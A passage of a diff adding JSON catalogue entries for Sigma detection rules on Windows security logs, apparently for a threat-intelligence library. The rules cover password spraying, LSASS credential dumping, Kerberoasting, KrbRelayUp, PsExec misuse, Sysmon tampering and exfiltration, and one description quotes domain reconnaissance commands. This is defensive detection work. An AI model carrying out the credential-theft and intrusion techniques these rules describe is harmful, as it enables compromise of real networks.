failed logins with multiple valid domain accounts from a single source system using the Kerberos protocol.", + "uuid": "5d1d946e-32e6-4d9a-a0dc-0ac022c7eb98", + "value": "Valid Users Failing to Authenticate From Single Source Using Kerberos", + "meta": { + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ], + "creation_date": "2021/06/01", + "filename": "win_security_susp_failed_logons_single_source_kerberos.yml", + "author": "Mauricio Velazco, frack113", + "level": "medium", + "falsepositive": [ + "Vulnerability scanners", + "Misconfigured systems", + "Remote administration tools", + "VPN terminators", + "Multiuser systems like Citrix server farms" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects failed logins with multiple disabled domain accounts from a single source system using the Kerberos protocol.", + "uuid": "4b6fe998-b69c-46d8-901b-13677c9fb663", + "value": "Disabled Users Failing To Authenticate From Source Using Kerberos", + "meta": { + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos2.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ], + "creation_date": "2021/06/01", + "filename": "win_security_susp_failed_logons_single_source_kerberos2.yml", + "author": "Mauricio Velazco, frack113", + "level": "medium", + "falsepositive": [ + "Vulnerability scanners", + "Misconfigured systems", + "Remote administration tools", + "VPN terminators", + "Multiuser systems like Citrix server farms" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects failed logins with multiple invalid domain accounts from a single source system using the Kerberos protocol.", + "uuid": "bc93dfe6-8242-411e-a2dd-d16fa0cc8564", + "value": "Invalid Users Failing To Authenticate From Source Using Kerberos", + "meta": { + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos3.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ], + "creation_date": "2021/06/01", + "filename": "win_security_susp_failed_logons_single_source_kerberos3.yml", + "author": "Mauricio Velazco, frack113", + "level": "medium", + "falsepositive": [ + "Vulnerability scanners", + "Misconfigured systems", + "Remote administration tools", + "VPN terminators", + "Multiuser systems like Citrix server farms" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects failed logins with multiple valid domain accounts from a single source system using the NTLM protocol.", + "uuid": "f88bab7f-b1f4-41bb-bdb1-4b8af35b0470", + "value": "Valid Users Failing to Authenticate from Single Source Using NTLM", + "meta": { + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_ntlm.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ], + "creation_date": "2021/06/01", + "filename": "win_security_susp_failed_logons_single_source_ntlm.yml", + "author": "Mauricio Velazco", + "level": "medium", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects failed logins with multiple invalid domain accounts from a single source system using the NTLM protocol.", + "uuid": "56d62ef8-3462-4890-9859-7b41e541f8d5", + "value": "Invalid Users Failing To Authenticate From Single Source Using NTLM", + "meta": { + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_ntlm2.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ], + "creation_date": "2021/06/01", + "filename": "win_security_susp_failed_logons_single_source_ntlm2.yml", + "author": "Mauricio Velazco", + "level": "medium", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", + "uuid": "9eb99343-d336-4020-a3cd-67f3819e68ee", + "value": "Account Tampering - Suspicious Failed Logon Reasons", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", + "https://twitter.com/SBousseaden/status/1101431884540710913", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access", + "attack.t1078" + ], + "creation_date": "2017/02/19", + "filename": "win_security_susp_failed_logon_reasons.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "User using a disabled account" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", + "uuid": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", + "value": "Failed Logon From Public IP", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_source.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.t1078", + "attack.t1190", + "attack.t1133" + ], + "creation_date": "2020/05/06", + "filename": "win_security_susp_failed_logon_source.yml", + "author": "NVISO", + "level": "medium", + "falsepositive": [ + "Legitimate logon attempts over the internet", + "IPv4-to-IPv6 mapped IPs" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a source system failing to authenticate against a remote host with multiple users.", + "uuid": "add2ef8d-dc91-4002-9e7e-f2702369f53a", + "value": "Multiple Users Remotely Failing To Authenticate From Single Source", + "meta": { + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_remote_logons_single_source.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ], + "creation_date": "2021/06/01", + "filename": "win_security_susp_failed_remote_logons_single_source.yml", + "author": "Mauricio Velazco", + "level": "medium", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", + "uuid": "f7644214-0eb0-4ace-9455-331ec4c09253", + "value": "Kerberos Manipulation", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212" + ], + "creation_date": "2017/02/10", + "filename": "win_security_susp_kerberos_manipulation.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Faulty legacy applications" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", + "uuid": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "value": "KrbRelayUp Attack Pattern", + "meta": { + "refs": [ + "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g", + "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_krbrelayup.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access" + ], + "creation_date": "2022/04/27", + "filename": "win_security_susp_krbrelayup.yml", + "author": "@SBousseaden, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", + "uuid": "d00a9a72-2c09-4459-ad03-5e0a23351e36", + "value": "Suspicious LDAP-Attributes Used", + "meta": { + "refs": [ + "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", + "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", + "https://github.com/fox-it/LDAPFragger", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml" + ], + "tags": [ + "attack.t1001.003", + "attack.command_and_control" + ], + "creation_date": "2019/03/24", + "filename": "win_security_susp_ldap_dataexchange.yml", + "author": "xknow @xknow_infosec", + "level": "high", + "falsepositive": [ + "Companies, who may use these default LDAP-Attributes for personal information" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", + "uuid": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "value": "Suspicious Windows ANONYMOUS LOGON Local Account Created", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1189469425482829824", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_local_anon_logon_created.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001", + "attack.t1136.002" + ], + "creation_date": "2019/10/31", + "filename": "win_security_susp_local_anon_logon_created.yml", + "author": "James Pemberton / @4A616D6573", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious processes logging on with explicit credentials", + "uuid": "941e5c45-cda7-4864-8cea-bbb7458d194a", + "value": "Suspicious Remote Logon with Explicit Credentials", + "meta": { + "refs": [ + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_explicit_credentials.yml" + ], + "tags": [ + "attack.t1078", + "attack.lateral_movement" + ], + "creation_date": "2020/10/05", + "filename": "win_security_susp_logon_explicit_credentials.yml", + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", + "level": "medium", + "falsepositive": [ + "Administrators that use the RunAS command or scheduled tasks" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects logon events that specify new credentials", + "uuid": "def8b624-e08f-4ae1-8612-1ba21190da6b", + "value": "Outgoing Logon with New Credentials", + "meta": { + "refs": [ + "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_newcredentials.yml" + ], + "tags": "No established tags", + "creation_date": "2022/04/06", + "filename": "win_security_susp_logon_newcredentials.yml", + "author": "Max Altgelt", + "level": "low", + "falsepositive": [ + "Legitimate remote administration activity" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", + "uuid": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", + "value": "Password Dumper Activity on LSASS", + "meta": { + "refs": [ + "https://twitter.com/jackcr/status/807385668833968128", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2017/02/12", + "filename": "win_security_susp_lsass_dump.yml", + "author": "sigma", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects process handle on LSASS process with certain access mask", + "uuid": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "value": "Generic Password Dumper Activity on LSASS", + "meta": { + "refs": [ + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml" + ], + "tags": [ + "attack.credential_access", + "car.2019-04-004", + "attack.t1003.001" + ], + "creation_date": "2019/11/01", + "filename": "win_security_susp_lsass_dump_generic.yml", + "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "level": "high", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects multiple file rename or delete events occurrence within a specified period of time by a same user (these events may signalize about ransomware activity).", + "uuid": "97919310-06a7-482c-9639-92b67ed63cf8", + "value": "Suspicious Multiple File Rename Or Delete Occurred", + "meta": { + "refs": [ + "https://www.manageengine.com/data-security/how-to/how-to-detect-ransomware-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_multiple_files_renamed_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ], + "creation_date": "2020/10/16", + "filename": "win_security_susp_multiple_files_renamed_or_deleted.yml", + "author": "Vasiliy Burov, oscd.community", + "level": "medium", + "falsepositive": [ + "Software uninstallation", + "Files restore activities" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", + "uuid": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "value": "Reconnaissance Activity", + "meta": { + "refs": [ + "https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_net_recon_activity.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002", + "attack.t1069.002", + "attack.s0039" + ], + "creation_date": "2017/03/07", + "filename": "win_security_susp_net_recon_activity.yml", + "author": "Florian Roth (rule), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", + "level": "high", + "falsepositive": [ + "Administrator activity" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "uuid": "00ba9da1-b510-4f6b-b258-8d338836180f", + "value": "Password Protected ZIP File Opened", + "meta": { + "refs": [ + "https://twitter.com/sbousseaden/status/1523383197513379841", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml" + ], + "tags": "No established tags", + "creation_date": "2022/05/09", + "filename": "win_security_susp_opened_encrypted_zip.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate used of encrypted ZIP files" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", + "uuid": "54f0434b-726f-48a1-b2aa-067df14516e4", + "value": "Password Protected ZIP File Opened (Suspicious Filenames)", + "meta": { + "refs": [ + "https://twitter.com/sbousseaden/status/1523383197513379841", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml" + ], + "tags": "No established tags", + "creation_date": "2022/05/09", + "filename": "win_security_susp_opened_encrypted_zip_filename.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate used of encrypted ZIP files" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "uuid": "571498c8-908e-40b4-910b-d2369159a3da", + "value": "Password Protected ZIP File Opened (Email Attachment)", + "meta": { + "refs": [ + "https://twitter.com/sbousseaden/status/1523383197513379841", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml" + ], + "tags": "No established tags", + "creation_date": "2022/05/09", + "filename": "win_security_susp_opened_encrypted_zip_outlook.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate used of encrypted ZIP files" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "uuid": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", + "value": "Suspicious Outbound Kerberos Connection - Security", + "meta": { + "refs": [ + "https://github.com/GhostPack/Rubeus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_outbound_kerberos_connection.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1558.003" + ], + "creation_date": "2019/10/24", + "filename": "win_security_susp_outbound_kerberos_connection.yml", + "author": "Ilyas Ochkov, oscd.community", + "level": "high", + "falsepositive": [ + "Other browsers" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects possible addition of shadow credentials to an active directory object.", + "uuid": "f598ea0c-c25a-4f72-a219-50c44411c791", + "value": "Possible Shadow Credentials Added", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html", + "https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/", + "https://twitter.com/SBousseaden/status/1581300963650187264?", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1556" + ], + "creation_date": "2022/10/17", + "filename": "win_security_susp_possible_shadow_credentials_added.yml", + "author": "Nasreddine Bencherchali (rule), Elastic (idea)", + "level": "high", + "falsepositive": [ + "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "uuid": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", + "value": "Suspicious PsExec Execution", + "meta": { + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_psexec.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2019/04/03", + "filename": "win_security_susp_psexec.yml", + "author": "Samir Bousseaden", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects known sensitive file extensions accessed on a network share", + "uuid": "91c945bc-2ad1-4799-a591-4d00198a1215", + "value": "Suspicious Access to Sensitive File Extensions", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_raccess_sensitive_fext.yml" + ], + "tags": [ + "attack.collection", + "attack.t1039" + ], + "creation_date": "2019/04/03", + "filename": "win_security_susp_raccess_sensitive_fext.yml", + "author": "Samir Bousseaden", + "level": "medium", + "falsepositive": [ + "Help Desk operator doing backup or re-imaging end user machine or backup software", + "Users working with these data types or exchanging message files" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects service ticket requests using RC4 encryption type", + "uuid": "496a0e47-0a33-4dca-b009-9e6ca3591f39", + "value": "Suspicious Kerberos RC4 Ticket Encryption", + "meta": { + "refs": [ + "https://adsecurity.org/?p=3458", + "https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ], + "creation_date": "2017/02/06", + "filename": "win_security_susp_rc4_kerberos.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Service accounts used on legacy systems (e.g. NetApp)", + "Windows Domains with DFL 2003 and legacy systems" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", + "uuid": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", + "value": "RottenPotato Like Attack Pattern", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1195284233729777665", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rottenpotato.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1557.001" + ], + "creation_date": "2019/11/15", + "filename": "win_security_susp_rottenpotato.yml", + "author": "@SBousseaden, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser().\n\"Audit User Account Management\" in \"Advanced Audit Policy Configuration\" has to be enabled in your local security policy / GPO to see this events.\n", + "uuid": "7818b381-5eb1-4641-bea5-ef9e4cfb5951", + "value": "Possible Remote Password Change Through SAMR", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_samr_pwset.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212" + ], + "creation_date": "2017/06/09", + "filename": "win_security_susp_samr_pwset.yml", + "author": "Dimitrios Slamaris", + "level": "medium", + "falsepositive": "No established falsepositives", + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", + "uuid": "3a734d25-df5c-4b99-8034-af1ddb5883a4", + "value": "Suspicious Scheduled Task Creation", + "meta": { + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" + ], + "creation_date": "2022/12/05", + "filename": "win_security_susp_scheduled_task_creation.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects when adversaries stop services or processes by deleting or disabling their respective schdueled tasks in order to conduct data destructive activities", + "uuid": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", + "value": "Important Scheduled Task Deleted/Disabled", + "meta": { + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_delete.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" + ], + "creation_date": "2022/12/05", + "filename": "win_security_susp_scheduled_task_delete.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects update to a scheduled task event that contain suspicious keywords.", + "uuid": "614cf376-6651-47c4-9dcc-6b9527f749f4", + "value": "Suspicious Scheduled Task Update", + "meta": { + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" + ], + "creation_date": "2022/12/05", + "filename": "win_security_susp_scheduled_task_update.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects renaming of file while deletion with SDelete tool.", + "uuid": "39a80702-d7ca-4a83-b776-525b1f86a36d", + "value": "Secure Deletion with SDelete", + "meta": { + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm", + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_sdelete.yml" + ], + "tags": [ + "attack.impact", + "attack.defense_evasion", + "attack.t1070.004", + "attack.t1027.005", + "attack.t1485", + "attack.t1553.002", + "attack.s0195" + ], + "creation_date": "2017/06/14", + "filename": "win_security_susp_sdelete.yml", + "author": "Thomas Patzke", + "level": "medium", + "falsepositive": [ + "Legitimate usage of SDelete" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detect scenarios where a potentially unauthorized application or user is modifying the system time.", + "uuid": "faa031b5-21ed-4e02-8881-2591f98d82ed", + "value": "Unauthorized System Time Modification", + "meta": { + "refs": [ + "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)", + "Live environment caused by malware", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.006" + ], + "creation_date": "2019/02/05", + "filename": "win_security_susp_time_modification.yml", + "author": "@neu5ron", + "level": "low", + "falsepositive": [ + "HyperV or other virtualization technologies with binary not listed in filter portion of detection" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detection of logins performed with WMI", + "uuid": "5af54681-df95-4c26-854f-2565e13cfab0", + "value": "Login with WMI", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_wmi_login.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ], + "creation_date": "2019/12/04", + "filename": "win_security_susp_wmi_login.yml", + "author": "Thomas Patzke", + "level": "low", + "falsepositive": [ + "Monitoring tools", + "Legitimate system administration" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects remote service activity via remote access to the svcctl named pipe", + "uuid": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", + "value": "Remote Service Activity via SVCCTL Named Pipe", + "meta": { + "refs": [ + "https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_svcctl_remote_service.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.persistence", + "attack.t1021.002" + ], + "creation_date": "2019/04/03", + "filename": "win_security_svcctl_remote_service.yml", + "author": "Samir Bousseaden", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", + "uuid": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", + "value": "SysKey Registry Keys Access", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190625024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_syskey_registry_access.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012" + ], + "creation_date": "2019/08/12", + "filename": "win_security_syskey_registry_access.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", + "uuid": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "value": "Sysmon Channel Reference Deletion", + "meta": { + "refs": [ + "https://twitter.com/Flangvik/status/1283054508084473861", + "https://twitter.com/SecurityJosh/status/1283027365770276866", + "https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html", + "https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2020/07/14", + "filename": "win_security_sysmon_channel_reference_deletion.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "uuid": "9c8afa4d-0022-48f0-9456-3712466f9701", + "value": "Tap Driver Installation - Security", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_tap_driver_installation.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048" + ], + "creation_date": "2019/10/24", + "filename": "win_security_tap_driver_installation.yml", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate OpenVPN TAP insntallation" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects an access to authentication tokens 